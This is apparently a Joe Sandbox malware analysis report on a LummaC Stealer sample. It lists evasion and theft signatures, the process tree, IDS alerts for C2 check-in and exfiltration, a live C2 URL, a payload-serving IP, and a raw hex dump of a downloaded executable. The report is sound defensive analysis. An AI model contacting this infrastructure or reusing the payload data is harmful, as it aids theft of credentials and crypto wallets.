Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1565421
MD5:90ca710aaf9dbeb26796e2023b2c20a4
SHA1:8004e727db0632790b42d2789bd0f538a3d8c702
SHA256:485ae38bfcb66923d04a09e0b1310c0d26f93c5b30742827f994ce1c7ec5aa28
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 1656 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 90CA710AAF9DBEB26796E2023B2C20A4)
    • chrome.exe (PID: 4236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 940 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1888 --field-trial-handle=1616,i,1849646799519399230,5755203485963844661,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 7644 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
      • chrome.exe (PID: 7840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2060,i,10926334977255808972,13126981693382377171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
{"C2 url": "https://atten-supporse.biz/api", "Build Version": "LOGS11--LiveTraffi"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2244834702.0000000000E76000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2197414052.0000000000E7A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2274068822.0000000000E83000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2271822071.0000000000E77000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2221046223.0000000000E76000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 4 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T19:49:07.933996+010020283713Unknown Traffic192.168.2.649707104.21.16.9443TCP
                2024-11-29T19:49:10.097977+010020283713Unknown Traffic192.168.2.649709104.21.16.9443TCP
                2024-11-29T19:49:12.837784+010020283713Unknown Traffic192.168.2.649710104.21.16.9443TCP
                2024-11-29T19:49:15.265810+010020283713Unknown Traffic192.168.2.649711104.21.16.9443TCP
                2024-11-29T19:49:17.729832+010020283713Unknown Traffic192.168.2.649713104.21.16.9443TCP
                2024-11-29T19:49:20.520862+010020283713Unknown Traffic192.168.2.649720104.21.16.9443TCP
                2024-11-29T19:49:23.434839+010020283713Unknown Traffic192.168.2.649728104.21.16.9443TCP
                2024-11-29T19:49:31.969756+010020283713Unknown Traffic192.168.2.649749104.21.16.9443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T19:49:08.733730+010020546531A Network Trojan was detected192.168.2.649707104.21.16.9443TCP
                2024-11-29T19:49:11.189119+010020546531A Network Trojan was detected192.168.2.649709104.21.16.9443TCP
                2024-11-29T19:49:32.776316+010020546531A Network Trojan was detected192.168.2.649749104.21.16.9443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T19:49:08.733730+010020498361A Network Trojan was detected192.168.2.649707104.21.16.9443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T19:49:11.189119+010020498121A Network Trojan was detected192.168.2.649709104.21.16.9443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T19:49:34.313988+010020197142Potentially Bad Traffic192.168.2.649755185.215.113.1680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T19:49:21.645569+010020480941Malware Command and Control Activity Detected192.168.2.649720104.21.16.9443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-29T19:49:23.455240+010028438641A Network Trojan was detected192.168.2.649728104.21.16.9443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: file.exeAvira: detected
                Source: file.exe.1656.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://atten-supporse.biz/api", "Build Version": "LOGS11--LiveTraffi"}
                Source: file.exeReversingLabs: Detection: 44%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: file.exeJoe Sandbox ML: detected
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0HTTP Parser: No favicon
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49726 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49728 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.6:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.6:49769 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.6:49799 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 2.18.84.141:443 -> 192.168.2.6:49800 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.6:49823 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49841 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49889 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 20.198.119.143:443 -> 192.168.2.6:49892 version: TLS 1.2

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49709 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49720 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49749 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:49728 -> 104.21.16.9:443
                Source: Malware configuration extractorURLs: https://atten-supporse.biz/api
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 29 Nov 2024 18:49:34 GMTContent-Type: application/octet-streamContent-Length: 2799616Last-Modified: Fri, 29 Nov 2024 18:37:00 GMTConnection: keep-aliveETag: "674a09cc-2ab800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 20 2b 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 2b 00 00 04 00 00 15 07 2b 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 74 65 64 74 7a 6f 67 00 60 2a 00 00 a0 00 00 00 58 2a 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 78 68 72 61 6a 70 79 00 20 00 00 00 00 2b 00 00 04 00 00 00 92 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 20 2b 00 00 22 00 00 00 96 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Source: Joe Sandbox ViewIP Address: 13.107.246.63 13.107.246.63
                Source: Joe Sandbox ViewIP Address: 185.215.113.16 185.215.113.16
                Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49728 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49720 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49749 -> 104.21.16.9:443
                Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49755 -> 185.215.113.16:80
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.7
                Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.7
                Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.7
                Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.7
                Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.7
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.143
                Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
                Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=79HRUOOHgFAO4nP&MD=mY8Kwcd6 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
                Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
